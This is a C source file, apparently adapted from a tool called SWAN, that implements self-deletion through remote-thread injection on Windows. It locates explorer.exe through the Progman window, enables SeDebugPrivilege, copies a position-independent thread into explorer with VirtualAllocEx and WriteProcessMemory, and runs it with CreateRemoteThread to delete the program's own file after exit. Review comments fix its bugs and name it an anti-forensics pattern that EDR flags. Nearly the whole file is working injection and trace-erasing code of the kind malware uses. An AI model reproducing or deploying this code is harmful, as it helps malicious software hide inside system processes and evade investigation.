远线程删除自身(来自SWAN)

#include <windows.h>
#include <stdio.h>

#ifndef DELETE_SELF_SWAN
#define DELETE_SELF_SWAN $$$
// Function-pointer types for the kernel32 entry points the injected thread
// uses. The first three are resolved in this process (DeleteSelf) and called
// in the target, which only works because the technique relies on kernel32
// being mapped at the same base address in the target process.
typedef HINSTANCE (__stdcall *rfdeleteLoadLibraryW)(LPCTSTR);     // despite the W suffix, DeleteSelf binds this to LoadLibraryA; the remote thread never calls it
typedef FARPROC (__stdcall *rfdeleteGetProcAddress)(HMODULE, LPCSTR);
typedef HINSTANCE (__stdcall *rfdeleteGetModuleHandle)(LPCTSTR);  // bound to GetModuleHandleA and called with a char*; LPCTSTR only matches when UNICODE is not defined

// Resolved inside the target by RemoteDeleteSelfThread through GetProcAddress.
typedef DWORD (__stdcall *rfdeleteDeleteFileA)(char*);            // the real export is BOOL DeleteFileA(LPCSTR); only the zero/non-zero result is used
typedef void (__stdcall *rfdeleteSleep)(DWORD);

// Data the remote thread acts on: which file to delete and how often to retry.
struct DeleteInfo
{
DWORD interval;      // milliseconds between DeleteFileA retries (DeleteSelf sets 200)
char filename[255];  // ANSI path of the file to delete; DeleteSelf fills it with GetModuleFileName(NULL, ..., 255).
                     // NOTE(review): 255 is below MAX_PATH (260), so a long install path can be truncated here.
};

// Everything RemoteDeleteSelfThread needs, written as one block into the target
// process by DeleteSelf (WriteProcessMemory) and passed as the thread argument.
// The copied code cannot use this module's imports or string literals, since
// those live in our address space, so both the bootstrap function pointers and
// the names to look up are shipped inside this structure.
struct RemoteParam
{
rfdeleteLoadLibraryW fnLoadLibrary;        // LoadLibraryA; present but not used by the remote thread
rfdeleteGetProcAddress fnGetProcAddress;   // used to resolve Sleep / DeleteFileA in the target
rfdeleteGetModuleHandle fnGetModuleHandle; // GetModuleHandleA; used to find kernel32 in the target

// Names the remote thread passes to GetModuleHandle/GetProcAddress. They must
// travel with the block: a literal in the remote code would be an address
// back into this process.
char strKernel32[32];     // "kernel32.dll"
char strSleep[32];        // "Sleep"
char strDeleteFileA[32];  // "DeleteFileA"
DeleteInfo di;            // file path and retry interval
};


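// Thread body that DeleteSelf copies byte-for-byte into another process and
// starts there with CreateRemoteThread. It therefore has to be position
// independent: no string literals, no direct calls to imports (those go
// through this module's import table, which does not exist in the target),
// no CRT, no exception or /GS machinery. Everything it needs arrives in the
// RemoteParam block pointed to by `para`.
//
// Resolves DeleteFileA and Sleep from kernel32 through the passed-in
// GetModuleHandle/GetProcAddress pointers, then retries DeleteFileA on
// di.filename every di.interval milliseconds until it succeeds. It never
// gives up on its own: a file that can never be deleted (still open by
// someone else) keeps this thread alive in the host process indefinitely.
//
// Returns 1 once the file is deleted, 0 if kernel32 or one of the two
// functions could not be resolved (the original dereferenced the null
// pointer instead).
DWORD WINAPI RemoteDeleteSelfThread(void *para)
{
    RemoteParam *rp = (RemoteParam *)para;

    HMODULE hKernel = rp->fnGetModuleHandle(rp->strKernel32);
    if (!hKernel)
        return 0;

    rfdeleteDeleteFileA fnDeleteFileA =
        (rfdeleteDeleteFileA)rp->fnGetProcAddress(hKernel, rp->strDeleteFileA);
    rfdeleteSleep fnSleep =
        (rfdeleteSleep)rp->fnGetProcAddress(hKernel, rp->strSleep);
    if (!fnDeleteFileA || !fnSleep)
        return 0;

    // Our image stays mapped until the launching process exits, so the first
    // attempts are expected to fail; keep polling.
    while (fnDeleteFileA(rp->di.filename) == 0) {
        // Must be the resolved pointer, not Sleep(): the original called Sleep
        // directly, which compiles to a call through this module's IAT entry and
        // faults once the code runs inside the target process.
        fnSleep(rp->di.interval);
    }

    return 1;
}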

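// Helpers are declared here but defined *after* DeleteSelf on purpose: the
// code size computed in DeleteSelf is the distance from RemoteDeleteSelfThread
// to DeleteSelf, which only holds if nothing is emitted between the two.
static bool EnableDebugPrivilege(void);
static bool FillRemoteParam(RemoteParam *rp);

// Arranges for this executable's file to be deleted after the process exits.
//
// Copies RemoteDeleteSelfThread plus a RemoteParam block into the process
// that owns the "Progman" desktop window (normally explorer.exe) and starts
// the copy there with CreateRemoteThread. The remote thread retries
// DeleteFileA on our own path until the file is gone. The caller is expected
// to exit shortly afterwards; while our image stays mapped the remote thread
// just keeps polling.
//
// This is the classic process-injection + self-deletion (anti-forensics)
// pattern. Expect CreateRemoteThread into explorer.exe to be flagged by EDR,
// and prefer MoveFileEx(MOVEFILE_DELAY_UNTIL_REBOOT) or a detached helper
// process in anything that is not a red-team tool.
//
// Returns true once the remote thread is running, false on any failure:
// no Progman window, target not openable, our path does not fit the
// parameter block, allocation/write/protect failure. On failure everything
// allocated in the target is released; on success the remote allocations
// cannot be freed (the thread is using them) and die with the host process.
//
// Caveats inherited from the design:
//  * The code size is the distance between RemoteDeleteSelfThread and
//    DeleteSelf plus a slack constant. This assumes the compiler emits the
//    two functions adjacently and in source order; incremental linking
//    (jump thunks), /GS cookies or optimizer reordering break the copy.
//  * RemoteDeleteSelfThread must stay free of imports, string literals and
//    CRT calls because it executes in another address space.
//  * The kernel32 pointers shipped in RemoteParam are only valid in the
//    target if kernel32 is mapped at the same base there.
DWORD DeleteSelf()
{
    RemoteParam rp;
    memset(&rp, 0, sizeof(rp));   // never copy uninitialized stack bytes into another process

    HANDLE hRemoteProcess = NULL;
    LPVOID pStart = NULL;
    LPVOID pParam = NULL;
    HANDLE hRemoteThread = NULL;
    DWORD oldProtect = 0;
    DWORD ok = false;

    // See the layout caveat above. A negative distance means the functions
    // were laid out in the other order; bail instead of allocating gigabytes.
    INT_PTR codeSize = (INT_PTR)DeleteSelf - (INT_PTR)RemoteDeleteSelfThread + 1102;
    if (codeSize <= 0)
        return false;
    SIZE_T iSizeNeed = (SIZE_T)codeSize;

    HWND hWnd = FindWindowA("Progman", "Program Manager");
    if (!hWnd)
        return false;

    DWORD dwRemoteProcessId = 0;
    if (!GetWindowThreadProcessId(hWnd, &dwRemoteProcessId) || !dwRemoteProcessId)
        return false;

    // Best effort, as before: explorer normally runs as the same user, so a
    // missing SeDebugPrivilege is not fatal (the original's AdjustTokenPrivileges
    // check never failed either, because that API returns TRUE even when the
    // privilege is not held).
    EnableDebugPrivilege();

    if (!FillRemoteParam(&rp))
        return false;

    hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,
                                 FALSE, dwRemoteProcessId);
    if (!hRemoteProcess)
        return false;

    // Code region: write it as RW, then flip to RX. Never leave a page that is
    // both writable and executable in the target.
    pStart = VirtualAllocEx(hRemoteProcess, NULL, iSizeNeed, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!pStart)
        goto cleanup;
    if (!WriteProcessMemory(hRemoteProcess, pStart, (LPCVOID)RemoteDeleteSelfThread, iSizeNeed, NULL))
        goto cleanup;
    if (!VirtualProtectEx(hRemoteProcess, pStart, iSizeNeed, PAGE_EXECUTE_READ, &oldProtect))
        goto cleanup;

    // Parameter block: plain data, so no execute permission.
    pParam = VirtualAllocEx(hRemoteProcess, NULL, sizeof(RemoteParam), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!pParam)
        goto cleanup;
    if (!WriteProcessMemory(hRemoteProcess, pParam, &rp, sizeof(RemoteParam), NULL))
        goto cleanup;

    hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0,
                                       (LPTHREAD_START_ROUTINE)pStart, pParam, 0, NULL);
    if (!hRemoteThread)
        goto cleanup;

    ok = true;

cleanup:
    if (!ok) {
        // MEM_RELEASE with size 0 frees the whole region. The original used
        // MEM_DECOMMIT with a size, which leaves the reservation behind in the
        // target's address space.
        if (pParam)
            VirtualFreeEx(hRemoteProcess, pParam, 0, MEM_RELEASE);
        if (pStart)
            VirtualFreeEx(hRemoteProcess, pStart, 0, MEM_RELEASE);
    }
    if (hRemoteThread)
        CloseHandle(hRemoteThread);
    if (hRemoteProcess)
        CloseHandle(hRemoteProcess);
    return ok;
}

// Enables SeDebugPrivilege in our own token so OpenProcess can reach targets
// we would otherwise be denied. Returns false if the token cannot be opened
// or the privilege is not held (AdjustTokenPrivileges signals that with
// ERROR_NOT_ALL_ASSIGNED while still returning TRUE). The token handle is
// always closed; the original leaked it on its error paths.
static bool EnableDebugPrivilege(void)
{
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return false;

    bool ok = false;
    TOKEN_PRIVILEGES tp;
    memset(&tp, 0, sizeof(tp));
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &tp.Privileges[0].Luid)
        && AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL)
        && GetLastError() != ERROR_NOT_ALL_ASSIGNED)
        ok = true;

    CloseHandle(hToken);
    return ok;
}

// Fills the block that is copied into the target: the kernel32 bootstrap
// pointers, the ANSI export names the remote thread resolves, our own image
// path and the retry interval. Returns false if kernel32 or one of the
// exports cannot be resolved, or if our path does not fit the buffer (a
// truncated path would make the remote thread poll forever, or delete the
// wrong file).
static bool FillRemoteParam(RemoteParam *rp)
{
    // kernel32 is always loaded; GetModuleHandle avoids bumping a refcount
    // that the original LoadLibrary call never released.
    HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
    if (!hKernel32)
        return false;

    rp->fnLoadLibrary = (rfdeleteLoadLibraryW)GetProcAddress(hKernel32, "LoadLibraryA");
    rp->fnGetProcAddress = (rfdeleteGetProcAddress)GetProcAddress(hKernel32, "GetProcAddress");
    rp->fnGetModuleHandle = (rfdeleteGetModuleHandle)GetProcAddress(hKernel32, "GetModuleHandleA");
    if (!rp->fnLoadLibrary || !rp->fnGetProcAddress || !rp->fnGetModuleHandle)
        return false;

    // Fixed literals, all far shorter than the 32-byte fields.
    strcpy(rp->strKernel32, "kernel32.dll");
    strcpy(rp->strSleep, "Sleep");
    strcpy(rp->strDeleteFileA, "DeleteFileA");

    // GetModuleFileName returns the buffer size when it truncates (and on
    // older Windows then leaves the string unterminated), so treat len >= size
    // as failure rather than shipping a mangled path.
    DWORD len = GetModuleFileNameA(NULL, rp->di.filename, sizeof(rp->di.filename));
    if (len == 0 || len >= sizeof(rp->di.filename))
        return false;

    rp->di.interval = 200;   // ms between DeleteFileA retries in the target
    return true;
}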
#endif

 
